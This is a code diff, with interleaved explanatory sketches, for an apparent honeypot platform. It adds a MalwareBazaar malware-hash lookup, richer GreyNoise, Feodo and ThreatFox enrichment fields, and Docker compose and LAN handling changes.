+from decnet.intel.base import IntelProvider, MalHashProvider
 _KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
@@ -37,6 +37,40 @@ def _provider_list() -> list[str]:
     return [p.strip().lower() for p in raw.split(",") if p.strip()]
+_mal_hash_singleton: MalHashProvider | None = None
+_mal_hash_initialized: bool = False
+
+
+def get_mal_hash_provider() -> MalHashProvider | None:
+    """Return the configured malware-hash lookup provider singleton.
+
+    Sibling factory to :func:`get_intel_providers` — different keyspace
+    (file SHA-256 vs IP), different consumer (the email ingester at
+    observation time, not the IP-keyed intel-worker fan-out). Returns
+    ``None`` only if intel is disabled wholesale; otherwise returns a
+    provider whose :meth:`is_known_bad` self-disables to a no-op when
+    ``DECNET_MALWAREBAZAAR_AUTH_KEY`` is unset, so the ingester never
+    has to special-case "no provider configured."
+    """
+    global _mal_hash_singleton, _mal_hash_initialized
+    if _mal_hash_initialized:
+        return _mal_hash_singleton
+    _mal_hash_initialized = True
+    if not _enabled():
+        _mal_hash_singleton = None
+        return None
+    from decnet.intel.mal_hash import MalwareBazaarProvider
+    _mal_hash_singleton = MalwareBazaarProvider()
+    return _mal_hash_singleton
+
+
+def _reset_mal_hash_provider_for_testing() -> None:
+    """Test hook — drop the singleton so the next call re-reads env."""
+    global _mal_hash_singleton, _mal_hash_initialized
+    _mal_hash_singleton = None
+    _mal_hash_initialized = False
+
+
 def get_intel_providers() -> List[IntelProvider]:
     """Return the configured threat-intel providers.


@@ -13,7 +13,6 @@ of attacker IPs map to a single network round-trip per refresh window.
 """
 from __future__ import annotations
-import json
 import time
 from datetime import datetime, timezone
 from typing import Any, Optional
@@ -93,16 +92,22 @@ class FeodoProvider(IntelProvider):
                 verdict=None,  # absence ≠ "benign", let other providers speak
                 column_updates={
                     "feodo_listed": False,
-                    "feodo_raw": "{}",
+                    "feodo_malware_family": None,
+                    "feodo_raw": {},
                     "feodo_queried_at": datetime.now(timezone.utc),
                 },
             )
+        family_obj = entry.get("malware")
+        family = (
+            family_obj if isinstance(family_obj, str) and family_obj else None
+        )
         return IntelResult(
             provider=self.name,
             verdict="malicious",
             column_updates={
                 "feodo_listed": True,
-                "feodo_raw": json.dumps(entry),
+                "feodo_malware_family": family,
+                "feodo_raw": entry,
                 "feodo_queried_at": datetime.now(timezone.utc),
             },
         )


@@ -25,7 +25,6 @@ Status code semantics:
 """
 from __future__ import annotations
-import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -71,7 +70,9 @@ class GreyNoiseProvider(IntelProvider):
                 verdict="unknown",
                 column_updates={
                     "greynoise_classification": "unknown",
-                    "greynoise_raw": json.dumps({"message": "not seen"}),
+                    "greynoise_name": None,
+                    "greynoise_tags": [],
+                    "greynoise_raw": {"message": "not seen"},
                     "greynoise_queried_at": datetime.now(timezone.utc),
                 },
             )
@@ -88,12 +89,25 @@ class GreyNoiseProvider(IntelProvider):
         classification = (data.get("classification") or "unknown").lower()
         verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
+        # The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
+        # "Censys") but no behavioral tag list — the tag taxonomy is
+        # paid-tier only. Persist whatever we got; a future non-Community
+        # provider may populate ``greynoise_tags``.
+        name_obj = data.get("name")
+        name = name_obj if isinstance(name_obj, str) and name_obj else None
+        tags_obj = data.get("tags")
+        tags: list[str] = (
+            [t for t in tags_obj if isinstance(t, str)]
+            if isinstance(tags_obj, list) else []
+        )
         return IntelResult(
             provider=self.name,
             verdict=verdict,
             column_updates={
                 "greynoise_classification": classification,
-                "greynoise_raw": json.dumps(data),
+                "greynoise_name": name,
+                "greynoise_tags": tags,
+                "greynoise_raw": data,
                 "greynoise_queried_at": datetime.now(timezone.utc),
             },
         )
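
The defensive coercion of `name` and `tags` in this hunk is easy to check on its own. The sketch below wraps the same expressions in a function; `coerce_name_and_tags` and the sample inputs are illustrative only and not part of the diff.

```python
from typing import Any, Optional


def coerce_name_and_tags(data: dict[str, Any]) -> tuple[Optional[str], list[str]]:
    """Normalise untrusted ``name`` / ``tags`` fields from an API payload."""
    name_obj = data.get("name")
    # Empty strings and non-strings both collapse to None.
    name = name_obj if isinstance(name_obj, str) and name_obj else None
    tags_obj = data.get("tags")
    # Anything that is not a list becomes []; non-string items are dropped.
    tags: list[str] = (
        [t for t in tags_obj if isinstance(t, str)]
        if isinstance(tags_obj, list) else []
    )
    return name, tags


print(coerce_name_and_tags({"name": "Tor", "tags": ["scanner", 7]}))
# ('Tor', ['scanner'])
```

The effect is that the stored columns always hold a string-or-None and a list of strings, whatever shape the upstream response takes.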

decnet/intel/mal_hash.py Normal file

@@ -0,0 +1,195 @@
"""MalwareBazaar bad-hash provider — bulk SHA-256 feed.

Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
shape, but operates on the SHA-256 keyspace instead of IPs and so
implements :class:`decnet.intel.base.MalHashProvider` rather than
:class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.

Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
30 MB resident as a ``set[str]`` of hex-lowercased hashes.

Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
the provider logs one warning at first refresh attempt and disables
itself for the process lifetime — :meth:`is_known_bad` returns ``False``
without ever making a network call. The ingester treats that the same
as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
bus payload (which is exactly what the predicate's ``is True`` check
does today, so the silent-no-op is behaviorally identical to "lane not
shipped yet").
"""
from __future__ import annotations

import csv
import io
import os
import time
import zipfile
from typing import Optional

from decnet.intel.base import MalHashProvider
from decnet.logging import get_logger
from decnet.net.http import stealth_client

log = get_logger("intel.mal_hash")

_ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
_DEFAULT_REFRESH_S = 86_400.0  # 24h — feed is daily, no need to hammer
_AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
_REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"


def _read_refresh_interval() -> float:
    raw = os.environ.get(_REFRESH_INTERVAL_ENV)
    if raw is None:
        return _DEFAULT_REFRESH_S
    try:
        return float(raw)
    except ValueError:
        log.warning(
            "%s=%r not a float; falling back to default %.0f",
            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
        )
        return _DEFAULT_REFRESH_S


class MalwareBazaarProvider(MalHashProvider):
    """Bulk SHA-256 lookup against MalwareBazaar's full export."""

    name = "malwarebazaar"

    def __init__(
        self,
        *,
        auth_key: Optional[str] = None,
        refresh_interval_s: Optional[float] = None,
    ) -> None:
        self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
        self._refresh_interval_s = (
            refresh_interval_s
            if refresh_interval_s is not None
            else _read_refresh_interval()
        )
        self._known: set[str] = set()
        self._loaded_at: float = 0.0
        self._last_error: Optional[str] = None
        self._disabled_warned: bool = False

    @property
    def disabled(self) -> bool:
        return self._auth_key is None

    async def _refresh(self) -> Optional[str]:
        """Refetch the bulk feed. Returns an error string or ``None``."""
        if self._auth_key is None:
            return "no auth key"
        try:
            async with stealth_client(timeout=60.0) as client:
                resp = await client.get(
                    _ENDPOINT, headers={"Auth-Key": self._auth_key},
                )
        except Exception as exc:  # noqa: BLE001
            return f"network: {exc}"
        if resp.status_code != 200:
            return f"HTTP {resp.status_code}"
        body = resp.content
        try:
            new_known = _parse_dump(body)
        except Exception as exc:  # noqa: BLE001
            return f"parse: {exc}"
        if not new_known:
            return "feed: empty"
        self._known = new_known
        self._loaded_at = time.monotonic()
        self._last_error = None
        log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
        return None

    async def _ensure_fresh(self) -> None:
        if self.disabled:
            if not self._disabled_warned:
                log.warning(
                    "R0046 mal_hash_match disabled: %s unset",
                    _AUTH_KEY_ENV,
                )
                self._disabled_warned = True
            return
        if (
            not self._known
            or (time.monotonic() - self._loaded_at) >= self._refresh_interval_s
        ):
            err = await self._refresh()
            if err:
                self._last_error = err
                log.warning("malwarebazaar refresh failed: %s", err)

    async def is_known_bad(self, sha256: str) -> bool:
        if self.disabled:
            return False
        try:
            await self._ensure_fresh()
        except Exception as exc:  # noqa: BLE001
            # Belt and braces: _ensure_fresh swallows refresh failures
            # but a bug in there shouldn't blow up the ingester payload.
            log.exception("malwarebazaar refresh raised: %s", exc)
            return False
        return sha256.lower() in self._known


def _parse_dump(body: bytes) -> set[str]:
    """Extract SHA-256 hashes from MalwareBazaar's full dump.

    The endpoint returns a ZIP archive containing a single CSV with a
    ``sha256_hash`` column. Some abuse.ch flavours of the same feed
    family ship plain CSV instead — handle both by sniffing the magic
    bytes. Hashes are lowercased; non-hex / wrong-length values are
    dropped (defense in depth — we set-membership-test by exact match).
    """
    if body[:2] == b"PK":
        with zipfile.ZipFile(io.BytesIO(body)) as zf:
            csv_names = [n for n in zf.namelist() if n.lower().endswith(".csv")]
            if not csv_names:
                raise ValueError("zip has no .csv member")
            with zf.open(csv_names[0]) as fh:
                csv_bytes = fh.read()
    else:
        csv_bytes = body
    text = csv_bytes.decode("utf-8", errors="replace")
    return _extract_hashes(text)
def _extract_hashes(text: str) -> set[str]:
"""Pull the ``sha256_hash`` column out of MalwareBazaar's CSV.
The dump prefaces the table with ``#``-prefixed comment lines.
Skip those, find the header row, locate the column, then read the
rest. csv.reader handles the quoting (the ``signature`` column
contains commas and is properly quoted in the dump).
"""
body_lines = [
line for line in text.splitlines()
if line and not line.lstrip().startswith("#")
]
if not body_lines:
return set()
reader = csv.reader(body_lines)
header = next(reader, None)
if not header:
return set()
norm = [h.strip().strip('"').lower() for h in header]
try:
col = norm.index("sha256_hash")
except ValueError:
# Fallback — first column is sha256 in every documented
# variant; if the header naming changes upstream we still
# capture something rather than silently emptying the set.
col = 0
out: set[str] = set()
for row in reader:
if len(row) <= col:
continue
cell = row[col].strip().strip('"').lower()
if len(cell) == 64 and all(c in "0123456789abcdef" for c in cell):
out.add(cell)
return out
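The ZIP-or-CSV sniffing described in `_parse_dump` can be exercised without touching the network. The following is a minimal sketch, not the project's code: `unwrap_csv` and the in-memory payload are hypothetical names and data invented for illustration.

```python
import io
import zipfile


def unwrap_csv(body: bytes) -> bytes:
    """Return CSV bytes whether *body* is a ZIP archive or plain CSV."""
    if body[:2] == b"PK":  # ZIP local-file-header magic bytes
        with zipfile.ZipFile(io.BytesIO(body)) as zf:
            names = [n for n in zf.namelist() if n.lower().endswith(".csv")]
            if not names:
                raise ValueError("zip has no .csv member")
            return zf.read(names[0])
    return body


# Hypothetical payload built in memory; this is not real feed data.
plain = b"# comment line\nsha256_hash\n" + b"ab" * 32 + b"\n"
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("full.csv", plain)
zipped = buffer.getvalue()
```

Both `unwrap_csv(zipped)` and `unwrap_csv(plain)` yield the same CSV bytes, which is the property the provider relies on before handing the text to the column parser.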


@@ -12,7 +12,6 @@ caps requests/min — the provider works either way.
 """
 from __future__ import annotations
-import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -71,7 +70,10 @@ class ThreatFoxProvider(IntelProvider):
 verdict=None, # absence is not a benign signal
 column_updates={
 "threatfox_listed": False,
-"threatfox_raw": "{}",
+"threatfox_threat_types": [],
+"threatfox_ioc_types": [],
+"threatfox_malware_families": [],
+"threatfox_raw": {},
 "threatfox_queried_at": datetime.now(timezone.utc),
 },
 )
@@ -83,12 +85,37 @@ class ThreatFoxProvider(IntelProvider):
 data = payload.get("data") or []
 listed = bool(data)
+# Each match in ``data`` carries threat_type / ioc_type / malware
+# (canonical family). The IntelLifter dispatches ATT&CK techniques
+# off ``threat_type`` (botnet_cc / payload_delivery / payload /
+# cc_skimming); the other two columns are evidence and SIEM
+# context. Sets are flattened across matches and serialised
+# sorted for determinism.
+threat_types: set[str] = set()
+ioc_types: set[str] = set()
+families: set[str] = set()
+if isinstance(data, list):
+for entry in data:
+if not isinstance(entry, dict):
+continue
+tt = entry.get("threat_type")
+if isinstance(tt, str) and tt:
+threat_types.add(tt)
+it = entry.get("ioc_type")
+if isinstance(it, str) and it:
+ioc_types.add(it)
+family = entry.get("malware") or entry.get("malware_printable")
+if isinstance(family, str) and family:
+families.add(family)
 return IntelResult(
 provider=self.name,
 verdict="malicious" if listed else None,
 column_updates={
 "threatfox_listed": listed,
-"threatfox_raw": json.dumps(data),
+"threatfox_threat_types": sorted(threat_types),
+"threatfox_ioc_types": sorted(ioc_types),
+"threatfox_malware_families": sorted(families),
+"threatfox_raw": data,
 "threatfox_queried_at": datetime.now(timezone.utc),
 },
 )
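As a rough illustration of the flattening step in the hunk above, the sketch below collects the three fields across matches and returns them sorted. The helper name `flatten_matches` and the sample entries are hypothetical; only the field names (`threat_type`, `ioc_type`, `malware`, `malware_printable`) come from the diff.

```python
from typing import Any


def flatten_matches(data: Any) -> dict[str, list[str]]:
    """Collect distinct values across matches, sorted for determinism."""
    threat_types: set[str] = set()
    ioc_types: set[str] = set()
    families: set[str] = set()
    if isinstance(data, list):
        for entry in data:
            if not isinstance(entry, dict):
                continue  # tolerate malformed entries
            for key, bucket in (("threat_type", threat_types),
                                ("ioc_type", ioc_types)):
                value = entry.get(key)
                if isinstance(value, str) and value:
                    bucket.add(value)
            family = entry.get("malware") or entry.get("malware_printable")
            if isinstance(family, str) and family:
                families.add(family)
    return {
        "threat_types": sorted(threat_types),
        "ioc_types": sorted(ioc_types),
        "malware_families": sorted(families),
    }


# Hypothetical matches, invented for illustration only.
SAMPLE = [
    {"threat_type": "botnet_cc", "ioc_type": "ip:port", "malware": "win.example"},
    {"threat_type": "payload_delivery", "ioc_type": "ip:port",
     "malware_printable": "Example"},
    "junk",
    {"threat_type": None},
]
```

Sorting the sets before storing them means two lookups that return the same matches in a different order produce identical column values.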


@@ -59,6 +59,38 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
 return None
+def _build_intel_event_payload(
+attacker_uuid: str,
+ip: str,
+row: dict[str, Any],
+providers: list[IntelProvider],
+) -> dict[str, Any]:
+"""Project the AttackerIntel row into the bus event the TTP worker
+consumes as ``source_kind="intel"``.
+"""
+return {
+"attacker_uuid": attacker_uuid,
+"attacker_ip": ip,
+"aggregate_verdict": row.get("aggregate_verdict"),
+"providers": [p.name for p in providers],
+# AbuseIPDB
+"abuseipdb_score": row.get("abuseipdb_score"),
+"abuseipdb_categories": row.get("abuseipdb_categories") or [],
+# GreyNoise
+"greynoise_classification": row.get("greynoise_classification"),
+"greynoise_name": row.get("greynoise_name"),
+"greynoise_tags": row.get("greynoise_tags") or [],
+# Feodo
+"feodo_listed": row.get("feodo_listed"),
+"feodo_malware_family": row.get("feodo_malware_family"),
+# ThreatFox
+"threatfox_listed": row.get("threatfox_listed"),
+"threatfox_threat_types": row.get("threatfox_threat_types") or [],
+"threatfox_ioc_types": row.get("threatfox_ioc_types") or [],
+"threatfox_malware_families": row.get("threatfox_malware_families") or [],
+}
 async def _enrich_one(
 attacker_uuid: str,
 ip: str,
@@ -172,12 +204,9 @@ async def run_intel_loop(
 await publish_safely(
 bus,
 _topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
-{
-"attacker_uuid": attacker_uuid,
-"attacker_ip": ip,
-"aggregate_verdict": row.get("aggregate_verdict"),
-"providers": [p.name for p in providers],
-},
+_build_intel_event_payload(
+attacker_uuid, ip, row, providers,
+),
 event_type=_topics.ATTACKER_INTEL_ENRICHED,
 )
 except Exception: # noqa: BLE001
@@ -200,11 +229,11 @@ async def run_intel_loop(
 t.cancel()
 if heartbeat_task is not None:
 heartbeat_task.cancel()
-for t in (*wake_tasks, heartbeat_task):
-if t is None:
+for task in (*wake_tasks, heartbeat_task):
+if task is None:
 continue
 with contextlib.suppress(asyncio.CancelledError, Exception):
-await t
+await task
 if bus is not None:
 with contextlib.suppress(Exception):
 await bus.close()
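The shutdown sequence in the last hunk (cancel every task, then await each one while suppressing the resulting errors) can be tried in isolation. This is a minimal sketch under assumed names: `shutdown`, `demo`, and the sleeping placeholder tasks are hypothetical and stand in for the loop's wake and heartbeat tasks.

```python
import asyncio
import contextlib
from typing import Iterable, Optional


async def shutdown(tasks: Iterable[Optional[asyncio.Task]]) -> None:
    """Cancel every task, then wait for each cancellation to finish."""
    tasks = list(tasks)
    for task in tasks:
        if task is not None:
            task.cancel()
    for task in tasks:
        if task is None:
            continue  # an optional task that was never started
        # Awaiting a cancelled task raises CancelledError; swallow it
        # (and any late failure) so shutdown itself cannot fail.
        with contextlib.suppress(asyncio.CancelledError, Exception):
            await task


async def demo() -> list[bool]:
    async def forever() -> None:
        await asyncio.sleep(3600)

    wake_tasks = [asyncio.create_task(forever()) for _ in range(2)]
    heartbeat_task = None  # models the "heartbeat disabled" case
    await asyncio.sleep(0)  # let the tasks start running
    await shutdown((*wake_tasks, heartbeat_task))
    return [t.cancelled() for t in wake_tasks]
```

Calling `asyncio.run(demo())` returns one flag per wake task, each reporting whether the task ended in the cancelled state.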


@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
 self.component = component
 def filter(self, record: logging.LogRecord) -> bool:
-record.decnet_component = self.component # type: ignore[attr-defined]
+record.decnet_component = self.component
 return True
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
 span = trace.get_current_span()
 ctx = span.get_span_context()
 if ctx and ctx.trace_id:
-record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
-record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
+record.otel_trace_id = format(ctx.trace_id, "032x")
+record.otel_span_id = format(ctx.span_id, "016x")
 else:
-record.otel_trace_id = "0" # type: ignore[attr-defined]
-record.otel_span_id = "0" # type: ignore[attr-defined]
+record.otel_trace_id = "0"
+record.otel_span_id = "0"
 except Exception:
-record.otel_trace_id = "0" # type: ignore[attr-defined]
-record.otel_span_id = "0" # type: ignore[attr-defined]
+record.otel_trace_id = "0"
+record.otel_span_id = "0"
 return True
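Both filters above work by attaching extra attributes to each `LogRecord` so that a formatter can reference them. The sketch below shows that mechanism with the standard library only; the class name `ComponentFilter`, the logger name, and the format string are assumptions made for the example, not the project's configuration.

```python
import io
import logging


class ComponentFilter(logging.Filter):
    """Stamp every record with a fixed component name."""

    def __init__(self, component: str) -> None:
        super().__init__()
        self.component = component

    def filter(self, record: logging.LogRecord) -> bool:
        record.decnet_component = self.component  # dynamic attribute
        return True  # never drop the record


stream = io.StringIO()
handler = logging.StreamHandler(stream)
# The formatter can use the attribute because the handler's filters run
# before the record is formatted.
handler.setFormatter(logging.Formatter("%(decnet_component)s %(message)s"))
handler.addFilter(ComponentFilter("intel"))

logger = logging.getLogger("sketch.component")  # hypothetical logger name
logger.addHandler(handler)
logger.setLevel(logging.INFO)
logger.propagate = False
logger.info("hello")
```

After the `logger.info` call, `stream.getvalue()` holds the formatted line with the component prefix.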


@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
 services: list[str] = PydanticField(..., min_length=1)
 distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
 base_image: str # Docker image for the base/IP-holder container
-build_base: str = "debian:bookworm-slim" # apt-compatible image for service Dockerfiles
+build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252" # apt-compatible image for service Dockerfiles; digest pinned via distros.py
 hostname: str
 archetype: str | None = None # archetype slug if spawned from an archetype profile
 service_config: dict[str, dict] = PydanticField(default_factory=dict)


@@ -101,7 +101,10 @@ async def mutate_decky(
 try:
 # Wrap blocking call in thread
-await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path)
+cp = compose_path
+await anyio.to_thread.run_sync(
+lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
+)
 except Exception as e:
 log.error("mutation failed decky=%s error=%s", decky_name, e)
 console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
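The hunk above wraps the blocking call in a lambda so that `compose_file` can be passed by keyword. The sketch below shows the same idea using only the standard library: `loop.run_in_executor` also forwards positional arguments only, so the keyword argument is bound up front. `compose_with_retry` here is a hypothetical stand-in that just formats its arguments, and the path is invented.

```python
import asyncio
import functools


def compose_with_retry(*args: str, compose_file: str) -> str:
    """Hypothetical blocking helper with a keyword-only argument."""
    return f"{compose_file}: {' '.join(args)}"


async def run_blocking() -> str:
    loop = asyncio.get_running_loop()
    # Bind the keyword argument before handing the callable to the
    # executor; a zero-argument lambda would work equally well.
    call = functools.partial(
        compose_with_retry, "up", "-d", "--remove-orphans",
        compose_file="/tmp/compose.yml",
    )
    return await loop.run_in_executor(None, call)
```

`functools.partial` and a lambda are interchangeable here; the partial has the small advantage of capturing its arguments at creation time rather than at call time.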
@@ -161,6 +164,8 @@ async def mutate_all(
 if force or only is not None:
 due = True
 else:
+if interval_mins is None:
+continue
 elapsed_secs = now - decky.last_mutated
 due = elapsed_secs >= (interval_mins * 60)
 remaining = (interval_mins * 60) - elapsed_secs
@@ -284,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
 return 0
 drained = 0
 for topo in pending:
-tid = topo["id"]
+tid = topo.id
 try:
 await _deployer.resync_agent_topology(repo, tid)
 await repo.set_topology_resync(tid, False)
 drained += 1
 log.info("topology %s resynced to agent %s",
-tid, topo.get("target_host_uuid"))
+tid, topo.target_host_uuid)
 except Exception as exc: # noqa: BLE001
 log.warning(
 "topology %s resync failed (will retry): %s", tid, exc,
@@ -405,11 +410,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
 t.cancel()
 if heartbeat_task is not None:
 heartbeat_task.cancel()
-for t in (*wake_tasks, heartbeat_task):
-if t is None:
+for task in (*wake_tasks, heartbeat_task):
+if task is None:
 continue
 with contextlib.suppress(asyncio.CancelledError, Exception):
-await t
+await task
 if bus is not None:
 with contextlib.suppress(Exception):
 await bus.close()


@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
)
async def _materialise_lan_change(
repo: Any,
topology_id: str,
*,
created: Optional[tuple[str, str, bool]] = None,
removed: Optional[str] = None,
) -> None:
"""Create or remove the docker bridge for a live LAN op + re-render compose.
Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
write lands. Skips when:
* the topology is not active/degraded (a pending topology gets its
networks created at deploy time),
* the topology is pinned to a swarm agent (cross-host materialisation
isn't implemented; the agent's apply_topology RPC re-renders the
whole compose at next push),
* the docker SDK / networking primitive raises (logged, not
re-raised — the DB row is the source of truth).
"""
topology = await repo.get_topology(topology_id)
if topology is None:
return
status = topology.status
if status not in ("active", "degraded"):
return
if topology.target_host_uuid:
_log.info(
"live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
topology_id,
)
return
# Lazy imports — these pull in docker.py / network.py which both
# require the docker SDK; keeping them out of module-import keeps
# the mutator usable in test environments that stub docker.
import docker
from decnet.engine.deployer import _topology_compose_path
from decnet.network import create_bridge_network, remove_bridge_network
from decnet.topology.compose import _network_name, write_topology_compose
client = docker.from_env()
try:
if created is not None:
name, subnet, is_dmz = created
net_name = _network_name(topology_id, name)
try:
create_bridge_network(
client, net_name, subnet, internal=not is_dmz,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
topology_id, name, subnet, exc,
)
# Don't re-raise — the DB row is the source of truth.
# Operator can retry by removing + re-adding the LAN.
if removed is not None:
net_name = _network_name(topology_id, removed)
try:
remove_bridge_network(client, net_name)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_lan: bridge remove failed topology=%s lan=%s: %s",
topology_id, removed, exc,
)
# Re-render compose so the file on disk matches the DB. Even
# when the bridge create above failed, a future redeploy will
# try to bring the network back from the compose definition.
hydrated = await hydrate(repo, topology_id)
if hydrated is not None:
try:
write_topology_compose(
hydrated, _topology_compose_path(topology_id),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live LAN op: compose re-render failed topology=%s: %s",
topology_id, exc,
)
except Exception as exc: # noqa: BLE001 — outer net for any docker SDK failure
_log.error(
"live LAN materialisation crashed topology=%s: %s",
topology_id, exc,
)
def _is_buildx_wedge(exc: BaseException) -> bool:
"""True when *exc* looks like the buildx EROFS wedge.
We consult both the structured CalledProcessError.stderr and the
str(exc) form because ``_compose_with_retry`` raises a synthetic
CalledProcessError whose ``stderr`` contains the recovery hint
(which preserves the wedge signatures verbatim).
"""
from decnet.engine.deployer import (
_BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
)
stderr = ""
if hasattr(exc, "stderr") and exc.stderr:
stderr = str(exc.stderr)
haystack = (stderr + " " + str(exc)).lower()
return (
_BUILDX_WEDGE_SIGNATURE in haystack
and _BUILDX_EROFS_SIGNATURE in haystack
)
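The wedge check above requires both signatures to appear in a lowercased haystack built from `stderr` and `str(exc)`. A minimal sketch of that matching follows. The two signature strings are placeholders chosen for the example (the real constants live in `decnet.engine.deployer` and are not shown in this diff), and `looks_like_wedge` is a hypothetical name.

```python
import subprocess

# Placeholder signatures; the project's real values are not shown here.
# They must be lowercase because the haystack is lowercased before matching.
WEDGE_SIGNATURE = "buildx"
EROFS_SIGNATURE = "read-only file system"


def looks_like_wedge(exc: BaseException) -> bool:
    """True only when both signatures appear in stderr or the message."""
    stderr = str(getattr(exc, "stderr", "") or "")
    haystack = (stderr + " " + str(exc)).lower()
    return WEDGE_SIGNATURE in haystack and EROFS_SIGNATURE in haystack


wedged = subprocess.CalledProcessError(
    1, ["docker", "compose", "up"],
    stderr="buildx: mkdir activity: Read-only file system",
)
```

Requiring both substrings keeps an unrelated buildx failure, or an unrelated read-only error, from triggering the legacy-builder fallback.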
async def _compose_up_with_buildkit_fallback(
*args: str, compose_file, label: str,
) -> None:
"""Run ``compose up`` and auto-fall-back to the legacy builder on wedge.
The buildx activity dir occasionally lands on a read-only mount —
happens enough on operator dev boxes that we don't want a single
wedge to abort a live decky-add. When _compose_with_retry raises
with the EROFS-wedge signatures, we retry once with
``DOCKER_BUILDKIT=0`` set. The legacy (non-buildx) builder doesn't
use the activity dir and isn't affected.
*label* is a human-readable identifier used only in log lines so an
operator can grep the fall-back back to the originating op.
"""
import anyio
from decnet.engine.deployer import _compose_with_retry
try:
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(*args, compose_file=compose_file),
)
return
except Exception as exc: # noqa: BLE001
if not _is_buildx_wedge(exc):
raise
_log.warning(
"%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
"(legacy builder). Recover the buildx state at your leisure: "
"rm -rf ~/.docker/buildx/activity && "
"docker buildx create --name decnet-builder --use --bootstrap",
label,
)
# Outside the except so the second attempt's traceback isn't
# nested under the first failure if it also blows up.
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(
*args, compose_file=compose_file,
env={"DOCKER_BUILDKIT": "0"},
),
)
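The retry-once shape of `_compose_up_with_buildkit_fallback` can be sketched without docker. In the example below, `up_with_fallback`, `demo`, and `fake_compose` are hypothetical names, and the simulated failure replaces a real compose invocation.

```python
import asyncio
from typing import Awaitable, Callable, Optional

Env = Optional[dict[str, str]]


async def up_with_fallback(
    run: Callable[[Env], Awaitable[None]],
    is_wedge: Callable[[BaseException], bool],
) -> None:
    """Try once with the default builder, then once with the legacy one."""
    try:
        await run(None)
        return
    except Exception as exc:
        if not is_wedge(exc):
            raise  # unrelated failures propagate unchanged
    # Retry outside the except block, mirroring the diff's comment about
    # keeping the second attempt's traceback separate from the first.
    await run({"DOCKER_BUILDKIT": "0"})


def demo() -> list[Env]:
    seen: list[Env] = []

    async def fake_compose(env: Env) -> None:
        # Hypothetical stand-in: fails only under the default builder.
        seen.append(env)
        if env is None:
            raise RuntimeError("simulated wedge")

    asyncio.run(up_with_fallback(fake_compose, lambda exc: "wedge" in str(exc)))
    return seen
```

`demo()` returns the environments the fake compose call saw, in order, which makes the single fallback attempt visible.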
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
"""Compose service names for one decky: base + each per-decky service.
Skips ``fleet_singleton`` services — those run once fleet-wide and
don't have a per-decky compose entry. Mirrors the same filter
applied at compose-render time
(:mod:`decnet.topology.compose.generate_topology_compose`).
"""
from decnet.services.registry import get_service
targets = [decky_name]
for svc_name in services:
try:
svc = get_service(svc_name)
except KeyError:
# Unknown service: keep the target. The compose render won't
# emit a fragment for it, so compose up will fail with a clear
# "no such service" error. Surface that rather than silently
# dropping it.
targets.append(f"{decky_name}-{svc_name}")
continue
if svc.fleet_singleton:
continue
targets.append(f"{decky_name}-{svc_name}")
return targets
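A small worked example may help show what `_decky_targets` returns. The registry below is a hypothetical dictionary standing in for `decnet.services.registry`, and the service names are invented; only the naming scheme (`<decky>-<service>`) and the `fleet_singleton` filter come from the code above.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Service:
    name: str
    fleet_singleton: bool = False


# Hypothetical registry contents, for illustration only.
REGISTRY = {
    "ssh": Service("ssh"),
    "http": Service("http"),
    "collector": Service("collector", fleet_singleton=True),
}


def decky_targets(decky_name: str, services: list[str]) -> list[str]:
    """Base container first, then one target per per-decky service."""
    targets = [decky_name]
    for svc_name in services:
        svc = REGISTRY.get(svc_name)
        if svc is not None and svc.fleet_singleton:
            continue  # runs once fleet-wide, no per-decky container
        # Unknown names are kept so compose can report them.
        targets.append(f"{decky_name}-{svc_name}")
    return targets
```

Slicing the result with `[1:]`, as the services-diff helper does, drops the base container and leaves only the service targets.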
async def _live_topology_or_none(
repo: Any, topology_id: str,
) -> Optional[Any]:
